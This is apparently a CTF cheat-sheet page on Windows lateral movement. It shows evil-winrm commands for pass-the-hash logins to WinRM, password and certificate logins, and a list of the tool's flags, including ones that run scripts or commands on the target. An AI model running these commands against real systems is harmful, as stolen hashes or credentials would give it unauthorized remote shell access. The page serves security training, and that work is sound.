> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-8/windows/lateral-movement-windows-authentication.md).

# Authentication

## Pass-The-Hash Authentication via WinRM

Use a user's NTLM hash to authenticate to the target's WinRM service instead of their plaintext password. The `evil-winrm` tool is specifically designed for this, allowing interactive shell access using the hash with the `-H` flag.

```bash
evil-winrm -i 10.10.186.106 -u Administrator -H 0e0363213e37b9**********b0bcb4fc
```

Alternatively, you can authenticate using a plaintext password with the `-p` flag:

```bash
evil-winrm -i 192.168.1.10 -u administrator -p 'Password123!'
```

Authentication can also be performed using a certificate file. This often requires specifying the certificate file (`-c`), the corresponding private key (`-k`), the domain realm (`-r`), and potentially the certificate thumbprint (`-f`).

```bash
evil-winrm -i 10.10.10.10 -c cert.pfx -k private.key -r domain.local -f certificate_thumbprint
```

The common parameters used with `evil-winrm` include:

* `-i <IP>`: IP address of the target machine
* `-u <USERNAME>`: Username for authentication
* `-p <PASSWORD>`: Password for authentication
* `-H <HASH>`: NTLM hash for authentication
* `-c <CERTIFICATE>`: Path to a certificate file for authentication
* `-k <PRIVATE_KEY>`: Path to a private key file (used with `-c`)
* `-r <REALM>`: Realm for Kerberos authentication (used with `-c` or `-k`)
* `-f <THUMBPRINT>`: Certificate thumbprint (used with `-c`)
* `-P <PORT>`: The WinRM port (default is 5985 or 5986 for SSL)
* `-s <SCRIPT>`: Execute a powershell script on the target
* `-e <COMMAND>`: Execute a command on the target
* `-S`: Enable SSL

Once connected, you will be presented with an interactive shell prompt similar to a standard Windows command prompt or PowerShell session.
